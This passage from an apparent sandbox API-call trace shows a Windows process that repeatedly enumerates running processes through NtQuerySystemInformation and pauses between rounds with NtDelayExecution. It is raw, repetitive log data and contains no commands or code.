RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.400] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.416] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.434] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.447] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.464] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.478] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.495] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.510] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.525] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.542] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.556] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.573] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.587] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.605] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.619] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.636] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.651] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.672] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.682] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.701] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.714] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.728] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: 